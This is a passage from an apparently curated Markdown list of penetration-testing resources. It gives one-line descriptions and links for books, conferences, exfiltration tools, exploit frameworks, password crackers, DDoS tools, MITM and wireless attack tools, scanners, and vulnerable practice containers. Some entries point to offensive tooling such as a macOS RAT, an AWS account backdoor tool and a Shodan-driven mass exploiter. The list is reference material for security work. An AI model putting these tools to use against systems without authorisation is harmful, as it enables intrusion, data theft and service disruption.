* [Advanced Penetration Testing for Highly-Secured Environments by Lee Allen, 2012](http://www.packtpub.com/networking-and-servers/advanced-penetration-testing-highly-secured-environments-ultimate-security-gu)
* [Advanced Persistent Threat Hacking: The Art and Science of Hacking Any Organization by Tyler Wrightson, 2014](http://www.amazon.com/Advanced-Persistent-Threat-Hacking-Organization/dp/0071828362)
* [Android Hacker's Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
* [BTFM: Blue Team Field Manual by Alan J White & Ben Clark, 2017](https://www.amazon.de/Blue-Team-Field-Manual-BTFM/dp/154101636X)
* [Black Hat Python: Python Programming for Hackers and Pentesters by Justin Seitz, 2014](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
* [Bug Hunter's Diary by Tobias Klein, 2011](https://nostarch.com/bughunter)
* [Car Hacker's Handbook by Craig Smith, 2016](https://nostarch.com/carhacking)
* [Fuzzing: Brute Force Vulnerability Discovery by Michael Sutton et al., 2007](http://www.fuzzing.org/)
* [Metasploit: The Penetration Tester's Guide by David Kennedy et al., 2011](https://nostarch.com/metasploit)
* [Penetration Testing: A Hands-On Introduction to Hacking by Georgia Weidman, 2014](https://nostarch.com/pentesting)
* [Penetration Testing: Procedures & Methodologies by EC-Council, 2010](http://www.amazon.com/Penetration-Testing-Procedures-Methodologies-EC-Council/dp/1435483677)
* [Professional Penetration Testing by Thomas Wilhelm, 2013](https://www.elsevier.com/books/professional-penetration-testing/wilhelm/978-1-59749-993-4)
* [RTFM: Red Team Field Manual by Ben Clark, 2014](http://www.amazon.com/Rtfm-Red-Team-Field-Manual/dp/1494295504/)
* [The Art of Exploitation by Jon Erickson, 2008](https://nostarch.com/hacking2.htm)
* [The Basics of Hacking and Penetration Testing by Patrick Engebretson, 2013](https://www.elsevier.com/books/the-basics-of-hacking-and-penetration-testing/engebretson/978-1-59749-655-1)
* [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
* [The Hacker Playbook by Peter Kim, 2014](http://www.amazon.com/The-Hacker-Playbook-Practical-Penetration/dp/1494932636/)
* [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
* [The Mobile Application Hacker's Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
* [Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp, 2010](http://www.amazon.com/Unauthorised-Access-Physical-Penetration-Security-ebook/dp/B005DIAPKE)
* [Violent Python by TJ O'Connor, 2012](https://www.elsevier.com/books/violent-python/unknown/978-1-59749-957-6)
* [iOS Hacker's Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
### Malware Analysis Books
See [awesome-malware-analysis § Books](https://github.com/rshipp/awesome-malware-analysis#books).
## CTF Tools
* [CTF Field Guide](https://trailofbits.github.io/ctf/) - Everything you need to win your next CTF competition.
* [Ciphey](https://github.com/ciphey/ciphey) - Automated decryption tool using artificial intelligence and natural language processing.
* [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) - Decrypt data enciphered using weak RSA keys, and recover private keys from public keys using a variety of automated attacks.
* [ctf-tools](https://github.com/zardus/ctf-tools) - Collection of setup scripts to install various security research tools easily and quickly deployable to new machines.
* [shellpop](https://github.com/0x00-0x00/shellpop) - Easily generate sophisticated reverse or bind shell commands to help you save time during penetration tests.
## Cloud Platform Attack Tools
See also *[HackingThe.cloud](https://hackingthe.cloud/)*.
* [Cloud Container Attack Tool (CCAT)](https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/) - Tool for testing security of container environments.
* [CloudHunter](https://github.com/belane/CloudHunter) - Looks for AWS, Azure and Google cloud storage buckets and lists permissions for vulnerable buckets.
* [Cloudsplaining](https://cloudsplaining.readthedocs.io/) - Identifies violations of least privilege in AWS IAM policies and generates a pretty HTML report with a triage worksheet.
* [Endgame](https://endgame.readthedocs.io/) - AWS Pentesting tool that lets you use one-liner commands to backdoor an AWS account's resources with a rogue AWS account.
* [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute) - Script to enumerate Google Storage buckets, determine what access you have to them, and determine if they can be privilege escalated.
## Collaboration Tools
* [Dradis](https://dradisframework.com) - Open-source reporting and collaboration tool for IT security professionals.
* [Lair](https://github.com/lair-framework/lair/wiki) - Reactive attack collaboration framework and web application built with meteor.
* [Pentest Collaboration Framework (PCF)](https://gitlab.com/invuls/pentest-projects/pcf) - Open source, cross-platform, and portable toolkit for automating routine pentest processes with a team.
* [Reconmap](https://reconmap.org/) - Open-source collaboration platform for InfoSec professionals that streamlines the pentest process.
* [RedELK](https://github.com/outflanknl/RedELK) - Track and alarm about Blue Team activities while providing better usability in long term offensive operations.
## Conferences and Events
* [BSides](http://www.securitybsides.com/) - Framework for organising and holding security conferences.
* [CTFTime.org](https://ctftime.org/) - Directory of upcoming and archive of past Capture The Flag (CTF) competitions with links to challenge writeups.
### Asia
* [HITB](https://conference.hitb.org/) - Deep-knowledge security conference held in Malaysia and The Netherlands.
* [HITCON](https://hitcon.org/) - Hacks In Taiwan Conference held in Taiwan.
* [Nullcon](http://nullcon.net/website/) - Annual conference in Delhi and Goa, India.
* [SECUINSIDE](http://secuinside.com) - Security Conference in Seoul.
### Europe
* [44Con](https://44con.com/) - Annual Security Conference held in London.
* [BalCCon](https://www.balccon.org) - Balkan Computer Congress, annually held in Novi Sad, Serbia.
* [BruCON](http://brucon.org) - Annual security conference in Belgium.
* [CCC](https://events.ccc.de/congress/) - Annual meeting of the international hacker scene in Germany.
* [DeepSec](https://deepsec.net/) - Security Conference in Vienna, Austria.
* [DefCamp](http://def.camp/) - Largest Security Conference in Eastern Europe, held annually in Bucharest, Romania.
* [FSec](http://fsec.foi.hr) - FSec - Croatian Information Security Gathering in Varaždin, Croatia.
* [Hack.lu](https://hack.lu/) - Annual conference held in Luxembourg.
* [Infosecurity Europe](http://www.infosecurityeurope.com/) - Europe's number one information security event, held in London, UK.
* [SteelCon](https://www.steelcon.info/) - Security conference in Sheffield UK.
* [Swiss Cyber Storm](https://www.swisscyberstorm.com/) - Annual security conference in Lucerne, Switzerland.
* [Troopers](https://www.troopers.de) - Annual international IT Security event with workshops held in Heidelberg, Germany.
* [HoneyCON](https://honeycon.eu/) - Annual Security Conference in Guadalajara, Spain. Organized by the HoneySEC association.
### North America
* [AppSecUSA](https://appsecusa.org/) - Annual conference organized by OWASP.
* [Black Hat](http://www.blackhat.com/) - Annual security conference in Las Vegas.
* [CarolinaCon](https://carolinacon.org/) - Infosec conference, held annually in North Carolina.
* [DEF CON](https://www.defcon.org/) - Annual hacker convention in Las Vegas.
* [DerbyCon](https://www.derbycon.com/) - Annual hacker conference based in Louisville.
* [Hackers Next Door](https://hnd.techlearningcollective.com/) - Cybersecurity and social technology conference held in New York City.
* [Hackers On Planet Earth (HOPE)](https://hope.net/) - Semi-annual conference held in New York City.
* [Hackfest](https://hackfest.ca) - Largest hacking conference in Canada.
* [LayerOne](http://www.layerone.org/) - Annual US security conference held every spring in Los Angeles.
* [National Cyber Summit](https://www.nationalcybersummit.com/) - Annual US security conference and Capture the Flag event, held in Huntsville, Alabama, USA.
* [PhreakNIC](http://phreaknic.info/) - Technology conference held annually in middle Tennessee.
* [RSA Conference USA](https://www.rsaconference.com/) - Annual security conference in San Francisco, California, USA.
* [ShmooCon](http://shmoocon.org/) - Annual US East coast hacker convention.
* [SkyDogCon](http://www.skydogcon.com/) - Technology conference in Nashville.
* [SummerCon](https://www.summercon.org/) - One of the oldest hacker conventions in America, held during Summer.
* [ThotCon](http://thotcon.org/) - Annual US hacker conference held in Chicago.
* [Virus Bulletin Conference](https://www.virusbulletin.com/conference/index) - Annual conference going to be held in Denver, USA for 2016.
### South America
* [Ekoparty](http://www.ekoparty.org) - Largest Security Conference in Latin America, held annually in Buenos Aires, Argentina.
* [Hackers to Hackers Conference (H2HC)](https://www.h2hc.com.br/) - Oldest security research (hacking) conference in Latin America and one of the oldest ones still active in the world.
### Zealandia
* [CHCon](https://chcon.nz) - Christchurch Hacker Con, Only South Island of New Zealand hacker con.
## Exfiltration Tools
* [DET](https://github.com/sensepost/DET) - Proof of concept to perform data exfiltration using either single or multiple channel(s) at the same time.
* [Iodine](https://code.kryo.se/iodine/) - Tunnel IPv4 data through a DNS server; useful for exfiltration from networks where Internet access is firewalled, but DNS queries are allowed.
* [TrevorC2](https://github.com/trustedsec/trevorc2) - Client/server tool for masking command and control and data exfiltration through a normally browsable website, not typical HTTP POST requests.
* [dnscat2](https://github.com/iagox86/dnscat2) - Tool designed to create an encrypted command and control channel over the DNS protocol, which is an effective tunnel out of almost every network.
* [pwnat](https://github.com/samyk/pwnat) - Punches holes in firewalls and NATs.
* [tgcd](http://tgcd.sourceforge.net/) - Simple Unix network utility to extend the accessibility of TCP/IP based network services beyond firewalls.
* [QueenSono](https://github.com/ariary/QueenSono) - Client/Server Binaries for data exfiltration with ICMP. Useful in a network where ICMP protocol is less monitored than others (which is a common case).
## Exploit Development Tools
See also *[Reverse Engineering Tools](#reverse-engineering-tools)*.
* [H26Forge](https://github.com/h26forge/h26forge) - Domain-specific infrastructure for analyzing, generating, and manipulating syntactically correct but semantically spec-non-compliant video files.
* [Magic Unicorn](https://github.com/trustedsec/unicorn) - Shellcode generator for numerous attack vectors, including Microsoft Office macros, PowerShell, HTML applications (HTA), or `certutil` (using fake certificates).
* [Pwntools](https://github.com/Gallopsled/pwntools) - Rapid exploit development framework built for use in CTFs.
* [Wordpress Exploit Framework](https://github.com/rastating/wordpress-exploit-framework) - Ruby framework for developing and using modules which aid in the penetration testing of WordPress powered websites and systems.
* [peda](https://github.com/longld/peda) - Python Exploit Development Assistance for GDB.
## File Format Analysis Tools
* [ExifTool](https://www.sno.phy.queensu.ca/~phil/exiftool/) - Platform-independent Perl library plus a command-line application for reading, writing and editing meta information in a wide variety of files.
* [Hachoir](https://hachoir.readthedocs.io/) - Python library to view and edit a binary stream as tree of fields and tools for metadata extraction.
* [Kaitai Struct](http://kaitai.io/) - File formats and network protocols dissection language and web IDE, generating parsers in C++, C#, Java, JavaScript, Perl, PHP, Python, Ruby.
* [peepdf](https://eternal-todo.com/tools/peepdf-pdf-analysis-tool) - Python tool to explore PDF files in order to find out if the file can be harmful or not.
* [Veles](https://codisec.com/veles/) - Binary data visualization and analysis tool.
## GNU/Linux Utilities
* [Hwacha](https://github.com/n00py/Hwacha) - Post-exploitation tool to quickly execute payloads via SSH on one or more Linux systems simultaneously.
* [Linux Exploit Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) - Heuristic reporting on potentially viable exploits for a given GNU/Linux system.
* [Lynis](https://cisofy.com/lynis/) - Auditing tool for UNIX-based systems.
* [checksec.sh](https://www.trapkit.de/tools/checksec.html) - Shell script designed to test what standard Linux OS and PaX security features are being used.
## Hash Cracking Tools
* [BruteForce Wallet](https://github.com/glv2/bruteforce-wallet) - Find the password of an encrypted wallet file (i.e. `wallet.dat`).
* [CeWL](https://digi.ninja/projects/cewl.php) - Generates custom wordlists by spidering a target's website and collecting unique words.
* [duplicut](https://github.com/nil0x42/duplicut) - Quickly remove duplicates, without changing the order, and without getting OOM on huge wordlists.
* [GoCrack](https://github.com/fireeye/gocrack) - Management Web frontend for distributed password cracking sessions using hashcat (or other supported tools) written in Go.
* [Hashcat](http://hashcat.net/hashcat/) - The more fast hash cracker.
* [hate_crack](https://github.com/trustedsec/hate_crack) - Tool for automating cracking methodologies through Hashcat.
* [JWT Cracker](https://github.com/lmammino/jwt-cracker) - Simple HS256 JSON Web Token (JWT) token brute force cracker.
* [John the Ripper](http://www.openwall.com/john/) - Fast password cracker.
* [Rar Crack](http://rarcrack.sourceforge.net) - RAR bruteforce cracker.
## Hex Editors
* [Bless](https://github.com/bwrsandman/Bless) - High quality, full featured, cross-platform graphical hex editor written in Gtk#.
* [Frhed](http://frhed.sourceforge.net/) - Binary file editor for Windows.
* [Hex Fiend](http://ridiculousfish.com/hexfiend/) - Fast, open source, hex editor for macOS with support for viewing binary diffs.
* [HexEdit.js](https://hexed.it) - Browser-based hex editing.
* [Hexinator](https://hexinator.com/) - World's finest (proprietary, commercial) Hex Editor.
* [hexedit](https://github.com/pixel/hexedit) - Simple, fast, console-based hex editor.
* [wxHexEditor](http://www.wxhexeditor.org/) - Free GUI hex editor for GNU/Linux, macOS, and Windows.
## Industrial Control and SCADA Systems
See also [awesome-industrial-control-system-security](https://github.com/hslatman/awesome-industrial-control-system-security).
* [Industrial Exploitation Framework (ISF)](https://github.com/dark-lbp/isf) - Metasploit-like exploit framework based on routersploit designed to target Industrial Control Systems (ICS), SCADA devices, PLC firmware, and more.
* [s7scan](https://github.com/klsecservices/s7scan) - Scanner for enumerating Siemens S7 PLCs on a TCP/IP or LLC network.
## Intentionally Vulnerable Systems
See also [awesome-vulnerable](https://github.com/kaiiyer/awesome-vulnerable).
### Intentionally Vulnerable Systems as Docker Containers
* [Damn Vulnerable Web Application (DVWA)](https://hub.docker.com/r/citizenstig/dvwa/) - `docker pull citizenstig/dvwa`.
* [OWASP Juice Shop](https://github.com/bkimminich/juice-shop#docker-container--) - `docker pull bkimminich/juice-shop`.
* [OWASP Mutillidae II Web Pen-Test Practice Application](https://hub.docker.com/r/citizenstig/nowasp/) - `docker pull citizenstig/nowasp`.
* [OWASP NodeGoat](https://github.com/owasp/nodegoat#option-3---run-nodegoat-on-docker) - `docker-compose build && docker-compose up`.
* [OWASP Security Shepherd](https://hub.docker.com/r/ismisepaul/securityshepherd/) - `docker pull ismisepaul/securityshepherd`.
* [OWASP WebGoat Project 7.1 docker image](https://hub.docker.com/r/webgoat/webgoat-7.1/) - `docker pull webgoat/webgoat-7.1`.
* [OWASP WebGoat Project 8.0 docker image](https://hub.docker.com/r/webgoat/webgoat-8.0/) - `docker pull webgoat/webgoat-8.0`.
* [Vulnerability as a service: Heartbleed](https://hub.docker.com/r/hmlio/vaas-cve-2014-0160/) - `docker pull hmlio/vaas-cve-2014-0160`.
* [Vulnerability as a service: SambaCry](https://hub.docker.com/r/vulnerables/cve-2017-7494/) - `docker pull vulnerables/cve-2017-7494`.
* [Vulnerability as a service: Shellshock](https://hub.docker.com/r/hmlio/vaas-cve-2014-6271/) - `docker pull hmlio/vaas-cve-2014-6271`.
* [Vulnerable WordPress Installation](https://hub.docker.com/r/wpscanteam/vulnerablewordpress/) - `docker pull wpscanteam/vulnerablewordpress`.
## Lock Picking
See [awesome-lockpicking](https://github.com/fabacab/awesome-lockpicking).
## macOS Utilities
* [Bella](https://github.com/kdaoudieh/Bella) - Pure Python post-exploitation data mining and remote administration tool for macOS.
* [EvilOSX](https://github.com/Marten4n6/EvilOSX) - Modular RAT that uses numerous evasion and exfiltration techniques out-of-the-box.
## Multi-paradigm Frameworks
* [Armitage](http://fastandeasyhacking.com/) - Java-based GUI front-end for the Metasploit Framework.
* [AutoSploit](https://github.com/NullArray/AutoSploit) - Automated mass exploiter, which collects target by employing the Shodan.io API and programmatically chooses Metasploit exploit modules based on the Shodan query.
* [Decker](https://github.com/stevenaldinger/decker) - Penetration testing orchestration and automation framework, which allows writing declarative, reusable configurations capable of ingesting variables and using outputs of tools it has run as inputs to others.
* [Faraday](https://github.com/infobyte/faraday) - Multiuser integrated pentesting environment for red teams performing cooperative penetration tests, security audits, and risk assessments.
* [Metasploit](https://www.metasploit.com/) - Software for offensive security teams to help verify vulnerabilities and manage security assessments.
* [Pupy](https://github.com/n1nj4sec/pupy) - Cross-platform (Windows, Linux, macOS, Android) remote administration and post-exploitation tool.
## Network Tools
* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec) - Swiss army knife for pentesting networks.
* [IKEForce](https://github.com/SpiderLabs/ikeforce) - Command line IPSEC VPN brute forcing tool for Linux that allows group name/ID enumeration and XAUTH brute forcing capabilities.
* [Intercepter-NG](http://sniff.su/) - Multifunctional network toolkit.
* [Legion](https://github.com/GoVanguard/legion) - Graphical semi-automated discovery and reconnaissance framework based on Python 3 and forked from SPARTA.
* [Network-Tools.com](http://network-tools.com/) - Website offering an interface to numerous basic network utilities like `ping`, `traceroute`, `whois`, and more.
* [Ncrack](https://nmap.org/ncrack/) - High-speed network authentication cracking tool built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords.
* [Praeda](http://h.foofus.net/?page_id=218) - Automated multi-function printer data harvester for gathering usable data during security assessments.
* [Printer Exploitation Toolkit (PRET)](https://github.com/RUB-NDS/PRET) - Tool for printer security testing capable of IP and USB connectivity, fuzzing, and exploitation of PostScript, PJL, and PCL printer language features.
* [SPARTA](https://sparta.secforce.com/) - Graphical interface offering scriptable, configurable access to existing network infrastructure scanning and enumeration tools.
* [SigPloit](https://github.com/SigPloiter/SigPloit) - Signaling security testing framework dedicated to telecom security for researching vulnerabilites in the signaling protocols used in mobile (cellular phone) operators.
* [Smart Install Exploitation Tool (SIET)](https://github.com/Sab0tag3d/SIET) - Scripts for identifying Cisco Smart Install-enabled switches on a network and then manipulating them.
* [THC Hydra](https://github.com/vanhauser-thc/thc-hydra) - Online password cracking tool with built-in support for many network protocols, including HTTP, SMB, FTP, telnet, ICQ, MySQL, LDAP, IMAP, VNC, and more.
* [Tsunami](https://github.com/google/tsunami-security-scanner) - General purpose network security scanner with an extensible plugin system for detecting high severity vulnerabilities with high confidence.
* [Zarp](https://github.com/hatRiot/zarp) - Network attack tool centered around the exploitation of local networks.
* [dnstwist](https://github.com/elceef/dnstwist) - Domain name permutation engine for detecting typo squatting, phishing and corporate espionage.
* [dsniff](https://www.monkey.org/~dugsong/dsniff/) - Collection of tools for network auditing and pentesting.
* [impacket](https://github.com/CoreSecurity/impacket) - Collection of Python classes for working with network protocols.
* [pivotsuite](https://github.com/RedTeamOperations/PivotSuite) - Portable, platform independent and powerful network pivoting toolkit.
* [routersploit](https://github.com/reverse-shell/routersploit) - Open source exploitation framework similar to Metasploit but dedicated to embedded devices.
* [rshijack](https://github.com/kpcyrd/rshijack) - TCP connection hijacker, Rust rewrite of `shijack`.
### DDoS Tools
* [Anevicon](https://github.com/rozgo/anevicon) - Powerful UDP-based load generator, written in Rust.
* [D(HE)ater](https://github.com/Balasys/dheater) - D(HE)ater sends forged cryptographic handshake messages to enforce the Diffie-Hellman key exchange.
* [HOIC](https://sourceforge.net/projects/high-orbit-ion-cannon/) - Updated version of Low Orbit Ion Cannon, has 'boosters' to get around common counter measures.
* [Low Orbit Ion Canon (LOIC)](https://github.com/NewEraCracker/LOIC) - Open source network stress tool written for Windows.
* [Memcrashed](https://github.com/649/Memcrashed-DDoS-Exploit) - DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API.
* [SlowLoris](https://github.com/gkbrk/slowloris) - DoS tool that uses low bandwidth on the attacking side.
* [T50](https://gitlab.com/fredericopissarra/t50/) - Faster network stress tool.
* [UFONet](https://github.com/epsylon/ufonet) - Abuses OSI layer 7 HTTP to create/manage 'zombies' and to conduct different attacks using; `GET`/`POST`, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.
### Network Reconnaissance Tools
* [ACLight](https://github.com/cyberark/ACLight) - Script for advanced discovery of sensitive Privileged Accounts - includes Shadow Admins.
* [AQUATONE](https://github.com/michenriksen/aquatone) - Subdomain discovery tool utilizing various open sources producing a report that can be used as input to other tools.
* [CloudFail](https://github.com/m0rtem/CloudFail) - Unmask server IP addresses hidden behind Cloudflare by searching old database records and detecting misconfigured DNS.
* [DNSDumpster](https://dnsdumpster.com/) - Online DNS recon and search service.
* [Mass Scan](https://github.com/robertdavidgraham/masscan) - TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.
* [OWASP Amass](https://github.com/OWASP/Amass) - Subdomain enumeration via scraping, web archives, brute forcing, permutations, reverse DNS sweeping, TLS certificates, passive DNS data sources, etc.
* [ScanCannon](https://github.com/johnnyxmas/ScanCannon) - POSIX-compliant BASH script to quickly enumerate large networks by calling `masscan` to quickly identify open ports and then `nmap` to gain details on the systems/services on those ports.
* [XRay](https://github.com/evilsocket/xray) - Network (sub)domain discovery and reconnaissance automation tool.
* [dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results.
* [dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper.
* [dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS enumeration script.
* [dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers.
* [fierce](https://github.com/mschwager/fierce) - Python3 port of the original `fierce.pl` DNS reconnaissance tool for locating non-contiguous IP space.
* [netdiscover](https://github.com/netdiscover-scanner/netdiscover) - Network address discovery scanner, based on ARP sweeps, developed mainly for those wireless networks without a DHCP server.
* [nmap](https://nmap.org/) - Free security scanner for network exploration & security audits.
* [passivedns-client](https://github.com/chrislee35/passivedns-client) - Library and query tool for querying several passive DNS providers.
* [passivedns](https://github.com/gamelinux/passivedns) - Network sniffer that logs all DNS server replies for use in a passive DNS setup.
* [RustScan](https://github.com/rustscan/rustscan) - Lightweight and quick open-source port scanner designed to automatically pipe open ports into Nmap.
* [scanless](https://github.com/vesche/scanless) - Utility for using websites to perform port scans on your behalf so as not to reveal your own IP.
* [smbmap](https://github.com/ShawnDEvans/smbmap) - Handy SMB enumeration tool.
* [subbrute](https://github.com/TheRook/subbrute) - DNS meta-query spider that enumerates DNS records, and subdomains.
* [zmap](https://zmap.io/) - Open source network scanner that enables researchers to easily perform Internet-wide network studies.
### Protocol Analyzers and Sniffers
See also [awesome-pcaptools](https://github.com/caesar0301/awesome-pcaptools).
* [Debookee](http://www.iwaxx.com/debookee/) - Simple and powerful network traffic analyzer for macOS.
* [Dshell](https://github.com/USArmyResearchLab/Dshell) - Network forensic analysis framework.
* [Netzob](https://github.com/netzob/netzob) - Reverse engineering, traffic generation and fuzzing of communication protocols.
* [Wireshark](https://www.wireshark.org/) - Widely-used graphical, cross-platform network protocol analyzer.
* [netsniff-ng](https://github.com/netsniff-ng/netsniff-ng) - Swiss army knife for network sniffing.
* [sniffglue](https://github.com/kpcyrd/sniffglue) - Secure multithreaded packet sniffer.
* [tcpdump/libpcap](http://www.tcpdump.org/) - Common packet analyzer that runs under the command line.
### Network Traffic Replay and Editing Tools
* [TraceWrangler](https://www.tracewrangler.com/) - Network capture file toolkit that can edit and merge `pcap` or `pcapng` files with batch editing features.
* [WireEdit](https://wireedit.com/) - Full stack WYSIWYG pcap editor (requires a free license to edit packets).
* [bittwist](http://bittwist.sourceforge.net/) - Simple yet powerful libpcap-based Ethernet packet generator useful in simulating networking traffic or scenario, testing firewall, IDS, and IPS, and troubleshooting various network problems.
* [hping3](https://github.com/antirez/hping) - Network tool able to send custom TCP/IP packets.
* [pig](https://github.com/rafael-santiago/pig) - GNU/Linux packet crafting tool.
* [scapy](https://github.com/secdev/scapy) - Python-based interactive packet manipulation program and library.
* [tcpreplay](https://tcpreplay.appneta.com/) - Suite of free Open Source utilities for editing and replaying previously captured network traffic.
### Proxies and Machine-in-the-Middle (MITM) Tools
See also *[Intercepting Web proxies](#intercepting-web-proxies)*.
* [BetterCAP](https://www.bettercap.org/) - Modular, portable and easily extensible MITM framework.
* [Ettercap](http://www.ettercap-project.org) - Comprehensive, mature suite for machine-in-the-middle attacks.
* [Habu](https://github.com/portantier/habu) - Python utility implementing a variety of network attacks, such as ARP poisoning, DHCP starvation, and more.
* [Lambda-Proxy](https://github.com/puresec/lambda-proxy) - Utility for testing SQL Injection vulnerabilities on AWS Lambda serverless functions.
* [MITMf](https://github.com/byt3bl33d3r/MITMf) - Framework for Man-In-The-Middle attacks.
* [Morpheus](https://github.com/r00t-3xp10it/morpheus) - Automated ettercap TCP/IP Hijacking tool.
* [SSH MITM](https://github.com/jtesta/ssh-mitm) - Intercept SSH connections with a proxy; all plaintext passwords and sessions are logged to disk.
* [dnschef](https://github.com/iphelix/dnschef) - Highly configurable DNS proxy for pentesters.
* [evilgrade](https://github.com/infobyte/evilgrade) - Modular framework to take advantage of poor upgrade implementations by injecting fake updates.
* [mallory](https://github.com/justmao945/mallory) - HTTP/HTTPS proxy over SSH.
* [oregano](https://github.com/nametoolong/oregano) - Python module that runs as a machine-in-the-middle (MITM) accepting Tor client requests.
* [sylkie](https://dlrobertson.github.io/sylkie/) - Command line tool and library for testing networks for common address spoofing security vulnerabilities in IPv6 networks using the Neighbor Discovery Protocol.
### Transport Layer Security Tools
* [SSLyze](https://github.com/nabla-c0d3/sslyze) - Fast and comprehensive TLS/SSL configuration analyzer to help identify security mis-configurations.
* [crackpkcs12](https://github.com/crackpkcs12/crackpkcs12) - Multithreaded program to crack PKCS#12 files (`.p12` and `.pfx` extensions), such as TLS/SSL certificates.
* [testssl.sh](https://github.com/drwetter/testssl.sh) - Command line tool which checks a server's service on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.
* [tls_prober](https://github.com/WestpointLtd/tls_prober) - Fingerprint a server's SSL/TLS implementation.
### Wireless Network Tools
* [Aircrack-ng](http://www.aircrack-ng.org/) - Set of tools for auditing wireless networks.
* [Airgeddon](https://github.com/v1s1t0r1sh3r3/airgeddon) - Multi-use bash script for Linux systems to audit wireless networks.
* [BoopSuite](https://github.com/MisterBianco/BoopSuite) - Suite of tools written in Python for wireless auditing.
* [Bully](http://git.kali.org/gitweb/?p=packages/bully.git;a=summary) - Implementation of the WPS brute force attack, written in C.
* [Cowpatty](https://github.com/joswr1ght/cowpatty) - Brute-force dictionary attack against WPA-PSK.
* [Fluxion](https://github.com/FluxionNetwork/fluxion) - Suite of automated social engineering based WPA attacks.
* [KRACK Detector](https://github.com/securingsam/krackdetector) - Detect and prevent KRACK attacks in your network.
* [Kismet](https://kismetwireless.net/) - Wireless network detector, sniffer, and IDS.
* [PSKracker](https://github.com/soxrok2212/PSKracker) - Collection of WPA/WPA2/WPS default algorithms, password generators, and PIN generators written in C.
* [Reaver](https://code.google.com/archive/p/reaver-wps) - Brute force attack against WiFi Protected Setup.
* [WiFi Pineapple](https://www.wifipineapple.com/) - Wireless auditing and penetration testing platform.
* [WiFi-Pumpkin](https://github.com/P0cL4bs/WiFi-Pumpkin) - Framework for rogue Wi-Fi access point attack.
* [Wifite](https://github.com/derv82/wifite) - Automated wireless attack tool.
* [infernal-twin](https://github.com/entropy1337/infernal-twin) - Automated wireless hacking tool.
* [krackattacks-scripts](https://github.com/vanhoefm/krackattacks-scripts) - WPA2 Krack attack scripts.
* [pwnagotchi](https://github.com/evilsocket/pwnagotchi) - Deep reinforcement learning based AI that learns from the Wi-Fi environment and instruments BetterCAP in order to maximize the WPA key material captured.
* [wifi-arsenal](https://github.com/0x90/wifi-arsenal) - Resources for Wi-Fi Pentesting.
## Network Vulnerability Scanners
* [celerystalk](https://github.com/sethsec/celerystalk) - Asynchronous enumeration and vulnerability scanner that "runs all the tools on all the hosts" in a configurable manner.
* [kube-hunter](https://kube-hunter.aquasec.com/) - Open-source tool that runs a set of tests ("hunters") for security issues in Kubernetes clusters from either outside ("attacker's view") or inside a cluster.
* [Nessus](https://www.tenable.com/products/nessus-vulnerability-scanner) - Commercial vulnerability management, configuration, and compliance assessment platform, sold by Tenable.
* [Netsparker Application Security Scanner](https://www.netsparker.com/pricing/) - Application security scanner to automatically find security flaws.
* [Nexpose](https://www.rapid7.com/products/nexpose/) - Commercial vulnerability and risk management assessment engine that integrates with Metasploit, sold by Rapid7.
* [OpenVAS](http://www.openvas.org/) - Free software implementation of the popular Nessus vulnerability assessment system.
* [Vuls](https://github.com/future-architect/vuls) - Agentless vulnerability scanner for GNU/Linux and FreeBSD, written in Go.
### Web Vulnerability Scanners
* [ACSTIS](https://github.com/tijme/angularjs-csti-scanner) - Automated client-side template injection (sandbox escape/bypass) detection for AngularJS.
* [Arachni](http://www.arachni-scanner.com/) - Scriptable framework for evaluating the security of web applications.
* [JCS](https://github.com/TheM4hd1/JCS) - Joomla Vulnerability Component Scanner with automatic database updater from exploitdb and packetstorm.
* [Nikto](https://cirt.net/nikto2) - Noisy but fast black box web server and web application vulnerability scanner.
* [SQLmate](https://github.com/UltimateHackers/sqlmate) - Friend of `sqlmap` that identifies SQLi vulnerabilities based on a given dork and (optional) website.
* [SecApps](https://secapps.com/) - In-browser web application security testing suite.
* [WPScan](https://wpscan.org/) - Black box WordPress vulnerability scanner.
* [Wapiti](http://wapiti.sourceforge.net/) - Black box web application vulnerability scanner with built-in fuzzer.
* [WebReaver](https://www.webreaver.com/) - Commercial, graphical web application vulnerability scanner designed for macOS.
* [cms-explorer](https://code.google.com/archive/p/cms-explorer/) - Reveal the specific modules, plugins, components and themes that various websites powered by content management systems are running.
* [joomscan](https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project) - Joomla vulnerability scanner.
* [skipfish](https://www.kali.org/tools/skipfish/) - Performant and adaptable active web application security reconnaissance tool.
* [w3af](https://github.com/andresriancho/w3af) - Web application attack and audit framework.
## Online Resources
### Online Operating Systems Resources
* [DistroWatch.com's Security Category](https://distrowatch.com/search.php?category=Security) - Website dedicated to talking about, reviewing, and keeping up to date with open source operating systems.
### Online Penetration Testing Resources
* [MITRE's Adversarial Tactics, Techniques & Common Knowledge (ATT&CK)](https://attack.mitre.org/) - Curated knowledge base and model for cyber adversary behavior.
* [Metasploit Unleashed](https://www.offensive-security.com/metasploit-unleashed/) - Free Offensive Security Metasploit course.
